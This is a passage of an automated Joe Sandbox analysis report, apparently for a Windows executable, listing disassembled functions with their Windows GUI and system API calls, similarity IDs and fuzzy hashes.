                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Empty$ClientCursorMessageScreenSend
                                                              • String ID:
                                                              • API String ID: 703117857-0
                                                              • Opcode ID: 853c8f7a2b210959e6a2240baec4e8266fd26be3efac5dd9b64a099d45e69993
                                                              • Instruction ID: aca0f21b90572743718de1640e46b563c546ef330466ac341b683173c888554c
                                                              • Opcode Fuzzy Hash: 853c8f7a2b210959e6a2240baec4e8266fd26be3efac5dd9b64a099d45e69993
                                                              • Instruction Fuzzy Hash: 9421A17250020ABFEF20ABA0CC48EEE7FB9FF48354F000564E54692161DB35EA85EB20
                                                              APIs
                                                              • RealChildWindowFromPoint.USER32(?,?,?), ref: 004E1079
                                                              • ClientToScreen.USER32(?,?), ref: 004E1098
                                                              • GetWindow.USER32(?,00000005), ref: 004E10FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$ChildClientFromPointRealScreen
                                                              • String ID:
                                                              • API String ID: 2518355518-0
                                                              • Opcode ID: 1926f1377abb663341dab73130d676f38a13f0a41a1c32b493f567340280ce9c
                                                              • Instruction ID: 21f2b922383a0fd422ed3da9be19d724b5084e606510e78c5381c08e838ca50c
                                                              • Opcode Fuzzy Hash: 1926f1377abb663341dab73130d676f38a13f0a41a1c32b493f567340280ce9c
                                                              • Instruction Fuzzy Hash: 2B217F7194125AAFDB10DFA5CC09BFFBBB8EF19312F10411AE511E2250CB3C9A85CBA5
                                                              APIs
                                                              • SelectObject.GDI32(?,00000000), ref: 00543552
                                                                • Part of subcall function 004E0E38: DeleteObject.GDI32 ref: 004E0E51
                                                              • SelectObject.GDI32(?,00000000), ref: 00543568
                                                              • DeleteObject.GDI32(00000000), ref: 005435D3
                                                              • DeleteDC.GDI32(00000000), ref: 005435E2
                                                              • LeaveCriticalSection.KERNEL32(00646BF4), ref: 005435FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Object$Delete$Select$CriticalLeaveSection
                                                              • String ID: DR`
                                                              • API String ID: 3849354926-1307419264
                                                              • Opcode ID: 6205af05e46f98150bf212836e28db27f51d65b4079176f63e5155422cf59c30
                                                              • Instruction ID: 6cdad22009b28a054dedf2b63d4fe814b76bcadc5a2896f89e6e5078544b55dd
                                                              • Opcode Fuzzy Hash: 6205af05e46f98150bf212836e28db27f51d65b4079176f63e5155422cf59c30
                                                              • Instruction Fuzzy Hash: 1C219871900204AFCF01EF6ACC849AA7FA6FF85315B0041AAF818DB166CB71C995DF80
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000037), ref: 005555D9
                                                              • GetSystemMetrics.USER32(00000032), ref: 005555DF
                                                              • GetSystemMetrics.USER32(00000037), ref: 005555EB
                                                              • GetSystemMetrics.USER32(00000036), ref: 005555F1
                                                              • GetSystemMetrics.USER32(00000031), ref: 005555F7
                                                              • GetSystemMetrics.USER32(00000036), ref: 00555603
                                                              • DrawIconEx.USER32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 0055563A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$DrawIcon
                                                              • String ID:
                                                              • API String ID: 2707151559-0
                                                              • Opcode ID: 55e88d8b371a73b044ccd5ce1f7a7a3b4541cc15b29952ca36d38e0febc69379
                                                              • Instruction ID: 72a3aefca654f0b652eed7935f6e52cbbc90e256f58b3199f51bad112e48056a
                                                              • Opcode Fuzzy Hash: 55e88d8b371a73b044ccd5ce1f7a7a3b4541cc15b29952ca36d38e0febc69379
                                                              • Instruction Fuzzy Hash: 46110C31740614B7D7119B748C59F5A7EADEF847A1F288427B608DB1C0E5B2DE06CBD0
                                                              APIs
                                                              • _memset.LIBCMT ref: 005C8617
                                                              • _wcslen.LIBCMT ref: 005C861D
                                                              • GetDC.USER32(00000000), ref: 005C864C
                                                              • EnumFontFamiliesExW.GDI32(00000000,?,005C85B3,?,00000000,?,?,?,?,?,?,000003EE,?), ref: 005C8667
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 005C866F
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EnumException@8FamiliesFontH_prolog3ReleaseThrow_memset_wcslen
                                                              • String ID: MS UI Gothic
                                                              • API String ID: 2708522728-1905310704
                                                              • Opcode ID: caee90a5613a4e46dbbe6e397f31e8f25a8c0d169e504f4072980667520f3f94
                                                              • Instruction ID: a0b35c9f3c4e8fe0cc7131493c573a496c448f1234c94db5b3087a7e2bfb81b7
                                                              • Opcode Fuzzy Hash: caee90a5613a4e46dbbe6e397f31e8f25a8c0d169e504f4072980667520f3f94
                                                              • Instruction Fuzzy Hash: 82018E72901318AFCB10EBE59C4DEBF7ABDEB95B14F14001EF805E7201EE64AA45C6A5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Task_impl$H_prolog3
                                                              • String ID:
                                                              • API String ID: 1204490572-0
                                                              • Opcode ID: 37b050ee82bedd0d8e663964db6441eb4e5d172ab6f1cf162af8e2dafed092cc
                                                              • Instruction ID: 07e389b372c89094363b459bc32f463b1d358b3b70830b76aacc97e700716bb7
                                                              • Opcode Fuzzy Hash: 37b050ee82bedd0d8e663964db6441eb4e5d172ab6f1cf162af8e2dafed092cc
                                                              • Instruction Fuzzy Hash: 03217C74405782CED714EBB4C15A7EEBFA1BF90308F50499DE5AB13282CFB42A08C766
                                                              APIs
                                                              • SetCapture.USER32(?), ref: 0050941B
                                                              • GetCursorPos.USER32(?), ref: 0050945A
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00509484
                                                              • SetCursor.USER32(00000000), ref: 0050948B
                                                              • GetCursorPos.USER32(?), ref: 00509498
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Cursor$CaptureLoad
                                                              • String ID: c
                                                              • API String ID: 1460996051-2927717585
                                                              • Opcode ID: 8e05a42018fbe4e3401effd640128ebc637fc92c8e2e29f7e6353e0aff243b65
                                                              • Instruction ID: e7cd695c52d6298642d230a66948d3354d65526613a98839869764a69aac4596
                                                              • Opcode Fuzzy Hash: 8e05a42018fbe4e3401effd640128ebc637fc92c8e2e29f7e6353e0aff243b65
                                                              • Instruction Fuzzy Hash: FA1182316006159FDB246B75C808BAA7BE9BF99704F00082DF59AC3292CF75A841C751
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004E833D
                                                              • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 004E839A
                                                              • GetProcAddress.KERNEL32(UnregisterTouchWindow), ref: 004E83BC
                                                                • Part of subcall function 004D94E4: ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ActivateH_prolog3
                                                              • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
                                                              • API String ID: 1001276555-2470269259
                                                              • Opcode ID: be21c2b777dab80b1d60571efea9688812de96065180d1e20b05c537febff952
                                                              • Instruction ID: 9ec46ebf7bdc1a872e1589784fcafca77bfe361bf32e50b6b897560c3093b2ad
                                                              • Opcode Fuzzy Hash: be21c2b777dab80b1d60571efea9688812de96065180d1e20b05c537febff952
                                                              • Instruction Fuzzy Hash: B111D374600B81EFEB159B26ED0671A3FA1BB01B19F40101EE94EC32A3CB799918CB49
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 004D9272
                                                              • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 004D928F
                                                              • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 004D9299
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                                              • String ID: ApplicationRecoveryFinished$ApplicationRecoveryInProgress$KERNEL32.DLL
                                                              • API String ID: 417325364-4287352451
                                                              • Opcode ID: 95c174d43f4f3ee51fe050fe6bc87c8ce7ad7f9bbf67e5e5a7a3d5154ecc8be0
                                                              • Instruction ID: d6344a7d50b2bdf339e600f27270fb42a8cac29cc698b1e358d63125cba74588
                                                              • Opcode Fuzzy Hash: 95c174d43f4f3ee51fe050fe6bc87c8ce7ad7f9bbf67e5e5a7a3d5154ecc8be0
                                                              • Instruction Fuzzy Hash: 3201B536A00219BBDB109BB5C858BBF7AACEF95724F1504ABE501D3340EE78DD00C6E4
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 004D9201
                                                              • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 004D921E
                                                              • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 004D9228
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              • RegisterApplicationRestart, xrefs: 004D9218
                                                              • KERNEL32.DLL, xrefs: 004D91FC
                                                              • RegisterApplicationRecoveryCallback, xrefs: 004D9220
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                                              • String ID: KERNEL32.DLL$RegisterApplicationRecoveryCallback$RegisterApplicationRestart
                                                              • API String ID: 417325364-723216104
                                                              • Opcode ID: 0257add5bdff0d557de0cec01c3c66a9c31673c8eced221f7e15ecb48c057639
                                                              • Instruction ID: fcb070ab3a5b6a60dadf7cb487fb8c8a82da0c22a702bae607ea869d953164dd
                                                              • Opcode Fuzzy Hash: 0257add5bdff0d557de0cec01c3c66a9c31673c8eced221f7e15ecb48c057639
                                                              • Instruction Fuzzy Hash: 67F0443254071A774FA11EA59C1896B3E6DEFD47A47040467FE04D2310DE79CC21EA95
                                                              APIs
                                                              • GetSysColor.USER32(0000000F), ref: 004E51C5
                                                              • GetSysColor.USER32(00000010), ref: 004E51CC
                                                              • GetSysColor.USER32(00000014), ref: 004E51D3
                                                              • GetSysColor.USER32(00000012), ref: 004E51DA
                                                              • GetSysColor.USER32(00000006), ref: 004E51E1
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004E51EE
                                                              • GetSysColorBrush.USER32(00000006), ref: 004E51F5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Color$Brush
                                                              • String ID:
                                                              • API String ID: 2798902688-0
                                                              • Opcode ID: 07b74aec56ab778d883f5e151053a67af3ffef57b59255917baa6269d2004b8c
                                                              • Instruction ID: 6eb716e637c610cba93e9d69d87ea17b2d77bef89959d1d940164d00c701fe50
                                                              • Opcode Fuzzy Hash: 07b74aec56ab778d883f5e151053a67af3ffef57b59255917baa6269d2004b8c
                                                              • Instruction Fuzzy Hash: 78F0FE719407445BD730BB725D09B57BAD1FFD4710F060D2ED2458B990DAB5E441DF40
                                                              APIs
                                                              • SetRectEmpty.USER32(?), ref: 00552F2C
                                                                • Part of subcall function 00551251: SetRectEmpty.USER32(?), ref: 0055125E
                                                                • Part of subcall function 00551251: GetWindowRect.USER32(?,?), ref: 0055126F
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • GetWindowRect.USER32(?,?), ref: 00553172
                                                              • IntersectRect.USER32(?,?,?), ref: 00553183
                                                              • IntersectRect.USER32(?,?,?), ref: 005531C0
                                                              • GetWindowRect.USER32(?,?), ref: 0055338F
                                                              • EqualRect.USER32(?,?), ref: 005533A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$EmptyIntersect$EqualException@8H_prolog3Throw
                                                              • String ID:
                                                              • API String ID: 3941049809-0
                                                              • Opcode ID: 169d21194b372c327e357bde7ae34b67508d5af3352e6b4f1cdc24f25fcd09e3
                                                              • Instruction ID: f9183859db7d2a7e26b3d29a3d21307e94109eea2d62957a9ff36fda1b7bf2bb
                                                              • Opcode Fuzzy Hash: 169d21194b372c327e357bde7ae34b67508d5af3352e6b4f1cdc24f25fcd09e3
                                                              • Instruction Fuzzy Hash: 5F122972D00659DFDF21CFA4C898AAEBFB5BF48341F15446AE809A7211D731AE49CF90
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0050EC89
                                                                • Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23
                                                              • GetWindowRect.USER32(?,?), ref: 0050ED84
                                                              • GetParent.USER32(?), ref: 0050ED91
                                                              • GetParent.USER32(?), ref: 0050EDAB
                                                              • OffsetRect.USER32(?,?,?), ref: 0050EE78
                                                              • OffsetRect.USER32(?,?,?), ref: 0050EE84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$OffsetParent$Long
                                                              • String ID:
                                                              • API String ID: 2171155602-0
                                                              • Opcode ID: 3d3dc0faf8145b5ba1438345c77b858d1ac81a5ef80e5fb2b11931c53d397ea7
                                                              • Instruction ID: 90dca300ff3582659f3501f45e831363a1d3c7e930b5586c73d47c26b2801fe2
                                                              • Opcode Fuzzy Hash: 3d3dc0faf8145b5ba1438345c77b858d1ac81a5ef80e5fb2b11931c53d397ea7
                                                              • Instruction Fuzzy Hash: 5291E375D00209EFCF15DFA8C989AEEBBB5FF48300F24496AE905A7251DB356A41CF60
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 0053F279
                                                              • GlobalLock.KERNEL32(?), ref: 0053F35F
                                                              • CreateDialogIndirectParamW.USER32(00000000,?,458DFFFB,0053EC59,00000000), ref: 0053F38E
                                                              • DestroyWindow.USER32(00000000), ref: 0053F408
                                                              • GlobalUnlock.KERNEL32(?), ref: 0053F418
                                                              • GlobalFree.KERNEL32(?), ref: 0053F421
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                                                              • String ID:
                                                              • API String ID: 3003189058-0
                                                              • Opcode ID: 0a1eaffd4d4c36ba7480227ff7093803f9bac748efd7598384ff8618f446b61e
                                                              • Instruction ID: 5ebd76345784a651a2efc4f485f84600a1d72290fb25731527eb427bb727c144
                                                              • Opcode Fuzzy Hash: 0a1eaffd4d4c36ba7480227ff7093803f9bac748efd7598384ff8618f446b61e
                                                              • Instruction Fuzzy Hash: 7C514C3190024AEFCF14AFA5C8899BEBFB5BF54314F14093EF542A72A1CB349A45DB61
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 0053D764
                                                              • GetWindowRect.USER32 ref: 0053D7A6
                                                              • GetWindowRect.USER32(?,?), ref: 0053D7D7
                                                              • OffsetRect.USER32(?,?,?), ref: 0053D846
                                                              • OffsetRect.USER32(?,?,?), ref: 0053D852
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0053D8A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
